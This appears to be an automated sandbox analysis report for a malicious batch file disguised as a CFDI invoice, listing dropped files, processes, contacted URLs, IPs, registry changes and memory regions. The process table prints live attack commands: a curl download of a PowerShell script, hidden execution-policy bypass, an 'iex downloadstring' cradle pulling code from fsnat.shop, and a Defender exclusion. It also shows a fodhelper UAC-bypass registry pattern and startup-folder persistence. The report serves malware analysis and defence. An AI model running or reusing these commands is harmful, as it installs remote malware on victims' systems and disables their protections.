Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Factura-2410-CFDI.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat
Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=481, window=hidenormalshowminimized
|
dropped
|
|
|
|
C:\Users\Public\Documents\vs1.ps1
|
awk or perl script, ASCII text, with very long lines (456), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\Public\computer_kjfech8_V.cmd
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\computer_kjfech8_Vy.cmd
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\_kjfech8_V\_kjfech8_V.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\_kjfech8_V\exe.txt
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\_kjfech8_V\jli.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash__kjfech8_Vi7.exe_c8f99aa578fab6eaaead194b1cb93e27a87ba_17b648d7_79ce850f-cd16-4317-9d1c-184b0f22106c\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A84.tmp.dmp
|
Mini DuMP crash report, 14 streams, Sat Oct 26 22:22:04 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B12.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B42.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qitb4ik.utm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wiwsnj3.adr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blqdhdij.dyb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnzpo32z.vty.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoibnyb5.1gg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kc0gc2oy.amb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m24gtgkd.jnw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oztbspws.bc5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spj4h3id.ev5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjkvajs3.ge2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygthgct0.dsq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zywqmgiq.4yr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Icon number=1, ctime=Sun Dec 31 23:25:52
1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1,
ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=1,
ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat
Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=482, window=hidenormalshowminimized
|
dropped
|
||
|
C:\Users\Public\201024
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows \System32\fodhelper.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\_kjfech8_V\6.txt
|
data
|
dropped
|
||
|
C:\_kjfech8_V\MSVCR100.dll (copy)
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\_kjfech8_V\MSVCR100.txt
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\_kjfech8_V\computer_kjfech8_V
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\_kjfech8_V\computer_kjfech8_Vy
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\_kjfech8_V\WebView2Loader.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\_kjfech8_V\WebView2Loader.txt
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\_kjfech8_V\_kjfech8_V._kjfech8_V
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\_kjfech8_V\_kjfech8_V.ai (copy)
|
data
|
dropped
|
||
|
C:\_kjfech8_V\_kjfech8_V.at (copy)
|
data
|
dropped
|
||
|
C:\_kjfech8_V\_kjfech8_V.ia (copy)
|
data
|
dropped
|
||
|
C:\_kjfech8_V\_kjfech8_V.zip (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\_kjfech8_V\b.txt
|
data
|
dropped
|
||
|
C:\_kjfech8_V\c.txt
|
data
|
dropped
|
||
|
C:\_kjfech8_V\i7.txt
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\_kjfech8_V\jli.txt
|
JSON data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
There are 41 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
|
|
|
|
C:\Windows\System32\curl.exe
|
curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2"
-o "C:\Users\Public\Documents\vs1.ps1"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up')
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -nop -win 1 -
|
|
|
|
C:\_kjfech8_V\_kjfech8_Vi7.exe
|
"C:\_kjfech8_V\_kjfech8_Vi7.exe"
|
|
|
|
C:\_kjfech8_V\_kjfech8_Vi7.exe
|
"C:\_kjfech8_V\_kjfech8_Vi7.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
|
|
|
|
C:\Windows\System32\shutdown.exe
|
"C:\Windows\system32\shutdown.exe" /r /t 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1];
".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit
1 } else { exit 0 }"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
|
|
|
http://62.72.3.210/ldht/index.php
|
62.72.3.210
|
|
|
|
https://github.com/Pester/Pester
|
unknown
|
|
|
|
https://fsnat.shop/a/08/150822/up/up
|
93.127.200.211
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://crl.microsoft.co:
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.htmlXzi
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.quovadis.bm0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.pngXzi
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://86.38.217.167
|
unknown
|
||
|
https://ocsp.quovadisoffshore.com0
|
unknown
|
||
|
http://62.72.3.210
|
unknown
|
||
|
https://github.com/Pester/PesterXzi
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fsnat.shop
|
93.127.200.211
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
93.127.200.211
|
fsnat.shop
|
Germany
|
|
|
|
62.72.3.210
|
unknown
|
Germany
|
|
|
|
86.38.217.167
|
unknown
|
Lithuania
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\ms-settings\Shell\Open\command
|
DelegateExecute
|
||
|
HKEY_CURRENT_USER_Classes\ms-settings\Shell\Open\command
|
NULL
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
ProgramId
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
FileId
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
LongPathHash
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
Name
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
OriginalFileName
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
Publisher
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
Version
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
BinFileVersion
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
BinaryType
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
ProductName
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
ProductVersion
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
LinkDate
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
BinProductVersion
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
Size
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
Language
|
||
|
\REGISTRY\A\{e6e2f99c-1712-8ac9-29a4-2b40104e2127}\Root\InventoryApplicationFile\_kjfech8_vi7.exe|e9f58e1b822d44ea
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
001800111E88FCB5
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
There are 30 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
14C393C1000
|
trusted library allocation
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
41BDFEE000
|
stack
|
page read and write
|
||
|
4709000
|
trusted library allocation
|
page read and write
|
||
|
1E7A714E000
|
trusted library allocation
|
page read and write
|
||
|
2783000
|
direct allocation
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
43E7000
|
trusted library allocation
|
page read and write
|
||
|
D02000
|
unkown
|
page readonly
|
||
|
304B000
|
stack
|
page read and write
|
||
|
1E7A534E000
|
trusted library allocation
|
page read and write
|
||
|
14C5180E000
|
heap
|
page read and write
|
||
|
89AF000
|
stack
|
page read and write
|
||
|
6C6D4000
|
unkown
|
page readonly
|
||
|
41BE2FE000
|
stack
|
page read and write
|
||
|
7FFF4432C000
|
trusted library allocation
|
page execute and read and write
|
||
|
721E000
|
stack
|
page read and write
|
||
|
41BEB7E000
|
stack
|
page read and write
|
||
|
E6E000
|
stack
|
page read and write
|
||
|
52B000
|
heap
|
page read and write
|
||
|
1E792E56000
|
trusted library allocation
|
page read and write
|
||
|
41A0000
|
trusted library allocation
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
heap
|
page read and write
|
||
|
81A2000
|
heap
|
page read and write
|
||
|
14C376A0000
|
trusted library allocation
|
page read and write
|
||
|
14C37734000
|
heap
|
page read and write
|
||
|
670D000
|
stack
|
page read and write
|
||
|
14C373E3000
|
heap
|
page read and write
|
||
|
1E7A2871000
|
trusted library allocation
|
page read and write
|
||
|
1AA88AA3000
|
heap
|
page read and write
|
||
|
6C4E0000
|
unkown
|
page readonly
|
||
|
6D997E000
|
stack
|
page read and write
|
||
|
77E000
|
stack
|
page read and write
|
||
|
14C51803000
|
heap
|
page read and write
|
||
|
1AA88A9C000
|
heap
|
page read and write
|
||
|
1AA88AA3000
|
heap
|
page read and write
|
||
|
E1E000
|
stack
|
page read and write
|
||
|
87CE000
|
stack
|
page read and write
|
||
|
14C5158A000
|
heap
|
page read and write
|
||
|
1952EFE000
|
stack
|
page read and write
|
||
|
88830FF000
|
stack
|
page read and write
|
||
|
4999000
|
trusted library allocation
|
page read and write
|
||
|
AED000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D40000
|
heap
|
page read and write
|
||
|
A4A000
|
stack
|
page read and write
|
||
|
6DA0BE000
|
stack
|
page read and write
|
||
|
89AC000
|
stack
|
page read and write
|
||
|
81B4000
|
heap
|
page read and write
|
||
|
1E790802000
|
heap
|
page read and write
|
||
|
276D000
|
direct allocation
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
1AA88B24000
|
heap
|
page read and write
|
||
|
7FFF444C0000
|
trusted library allocation
|
page read and write
|
||
|
1AA88ACB000
|
heap
|
page read and write
|
||
|
1E7A5D4E000
|
trusted library allocation
|
page read and write
|
||
|
AE0000
|
trusted library allocation
|
page read and write
|
||
|
6DA1000
|
heap
|
page read and write
|
||
|
D01000
|
unkown
|
page execute read
|
||
|
1DD000
|
stack
|
page read and write
|
||
|
14C39074000
|
heap
|
page read and write
|
||
|
888317E000
|
stack
|
page read and write
|
||
|
14C517E3000
|
heap
|
page read and write
|
||
|
7FFF44280000
|
trusted library allocation
|
page read and write
|
||
|
6C4E1000
|
unkown
|
page execute read
|
||
|
14C376C0000
|
heap
|
page execute and read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
1AA88AAB000
|
heap
|
page read and write
|
||
|
278A000
|
direct allocation
|
page read and write
|
||
|
14C51551000
|
heap
|
page read and write
|
||
|
6C6C0000
|
unkown
|
page read and write
|
||
|
4A37000
|
trusted library allocation
|
page read and write
|
||
|
1952FFE000
|
stack
|
page read and write
|
||
|
14C375E0000
|
heap
|
page read and write
|
||
|
5311000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
14C51790000
|
heap
|
page read and write
|
||
|
B49000
|
heap
|
page read and write
|
||
|
14C5179C000
|
heap
|
page read and write
|
||
|
7FFF44430000
|
trusted library allocation
|
page execute and read and write
|
||
|
D04000
|
unkown
|
page readonly
|
||
|
49E000
|
unkown
|
page read and write
|
||
|
1E792200000
|
trusted library allocation
|
page read and write
|
||
|
47C7000
|
trusted library allocation
|
page read and write
|
||
|
D01000
|
unkown
|
page execute read
|
||
|
6E90000
|
trusted library allocation
|
page read and write
|
||
|
D00000
|
unkown
|
page readonly
|
||
|
1AA88AF1000
|
heap
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
485E000
|
trusted library allocation
|
page read and write
|
||
|
4120000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44356000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
825C000
|
heap
|
page read and write
|
||
|
6DAF8F000
|
stack
|
page read and write
|
||
|
41BF88E000
|
stack
|
page read and write
|
||
|
41BF8CF000
|
stack
|
page read and write
|
||
|
8130000
|
trusted library allocation
|
page read and write
|
||
|
7FFF444B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44273000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFF444F0000
|
trusted library allocation
|
page read and write
|
||
|
80DE000
|
stack
|
page read and write
|
||
|
41C0000
|
heap
|
page execute and read and write
|
||
|
73DE000
|
stack
|
page read and write
|
||
|
1E792230000
|
heap
|
page readonly
|
||
|
878E000
|
stack
|
page read and write
|
||
|
6C6C1000
|
unkown
|
page write copy
|
||
|
B8A000
|
heap
|
page read and write
|
||
|
14C37300000
|
heap
|
page read and write
|
||
|
7FFF44452000
|
trusted library allocation
|
page read and write
|
||
|
14C39B82000
|
trusted library allocation
|
page read and write
|
||
|
D04000
|
unkown
|
page readonly
|
||
|
1E7922C0000
|
heap
|
page execute and read and write
|
||
|
7FFF445A0000
|
trusted library allocation
|
page read and write
|
||
|
6D84000
|
heap
|
page read and write
|
||
|
6D9EB8000
|
stack
|
page read and write
|
||
|
14C38FA0000
|
heap
|
page read and write
|
||
|
41BE97E000
|
stack
|
page read and write
|
||
|
14C373BD000
|
heap
|
page read and write
|
||
|
741C000
|
stack
|
page read and write
|
||
|
2784F150000
|
heap
|
page read and write
|
||
|
4168000
|
trusted library allocation
|
page read and write
|
||
|
6D6A000
|
heap
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
499D000
|
trusted library allocation
|
page read and write
|
||
|
6D9BFF000
|
stack
|
page read and write
|
||
|
88EE000
|
stack
|
page read and write
|
||
|
1E7930C2000
|
trusted library allocation
|
page read and write
|
||
|
1E7908EE000
|
heap
|
page read and write
|
||
|
7FFF44326000
|
trusted library allocation
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
41BFC4D000
|
stack
|
page read and write
|
||
|
864E000
|
stack
|
page read and write
|
||
|
14C514D0000
|
heap
|
page read and write
|
||
|
14C51528000
|
heap
|
page read and write
|
||
|
D00000
|
unkown
|
page readonly
|
||
|
7FFF445C0000
|
trusted library allocation
|
page read and write
|
||
|
48D8000
|
trusted library allocation
|
page read and write
|
||
|
B1D000
|
stack
|
page read and write
|
||
|
1E7A854E000
|
trusted library allocation
|
page read and write
|
||
|
14C51582000
|
heap
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
1E79082C000
|
heap
|
page read and write
|
||
|
14C517D6000
|
heap
|
page read and write
|
||
|
14C51797000
|
heap
|
page read and write
|
||
|
6FE000
|
stack
|
page read and write
|
||
|
6D9C7F000
|
stack
|
page read and write
|
||
|
892D000
|
stack
|
page read and write
|
||
|
41BF9CA000
|
stack
|
page read and write
|
||
|
14C37462000
|
heap
|
page read and write
|
||
|
2784EE34000
|
heap
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
42F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFF442CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
6749000
|
stack
|
page read and write
|
||
|
14C517A7000
|
heap
|
page read and write
|
||
|
1AA88AAF000
|
heap
|
page read and write
|
||
|
1AA88ACA000
|
heap
|
page read and write
|
||
|
7FFF44421000
|
trusted library allocation
|
page read and write
|
||
|
1E7909D0000
|
heap
|
page read and write
|
||
|
884E000
|
stack
|
page read and write
|
||
|
5307000
|
trusted library allocation
|
page read and write
|
||
|
809E000
|
stack
|
page read and write
|
||
|
41BFB4C000
|
stack
|
page read and write
|
||
|
71DE000
|
stack
|
page read and write
|
||
|
1E792A77000
|
trusted library allocation
|
page read and write
|
||
|
7FFF4442A000
|
trusted library allocation
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page execute and read and write
|
||
|
2758000
|
direct allocation
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
D02000
|
unkown
|
page readonly
|
||
|
1AA88B25000
|
heap
|
page read and write
|
||
|
801E000
|
stack
|
page read and write
|
||
|
2738000
|
direct allocation
|
page read and write
|
||
|
14C515C8000
|
heap
|
page read and write
|
||
|
81BC000
|
heap
|
page read and write
|
||
|
14C373C4000
|
heap
|
page read and write
|
||
|
52FB000
|
trusted library allocation
|
page read and write
|
||
|
1AA88AD0000
|
heap
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
1E790876000
|
heap
|
page read and write
|
||
|
14C395F4000
|
trusted library allocation
|
page read and write
|
||
|
2747000
|
direct allocation
|
page read and write
|
||
|
7FFF44570000
|
trusted library allocation
|
page read and write
|
||
|
14C37570000
|
heap
|
page read and write
|
||
|
81C4000
|
heap
|
page read and write
|
||
|
411A000
|
trusted library allocation
|
page execute and read and write
|
||
|
41BEA7B000
|
stack
|
page read and write
|
||
|
68EE000
|
stack
|
page read and write
|
||
|
1E7930B4000
|
trusted library allocation
|
page read and write
|
||
|
41BE678000
|
stack
|
page read and write
|
||
|
1E8000
|
stack
|
page read and write
|
||
|
1E7A7B4E000
|
trusted library allocation
|
page read and write
|
||
|
277C000
|
direct allocation
|
page read and write
|
||
|
84B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFF44272000
|
trusted library allocation
|
page read and write
|
||
|
7FFF444A0000
|
trusted library allocation
|
page read and write
|
||
|
14C51614000
|
heap
|
page read and write
|
||
|
170000
|
heap
|
page read and write
|
||
|
2766000
|
direct allocation
|
page read and write
|
||
|
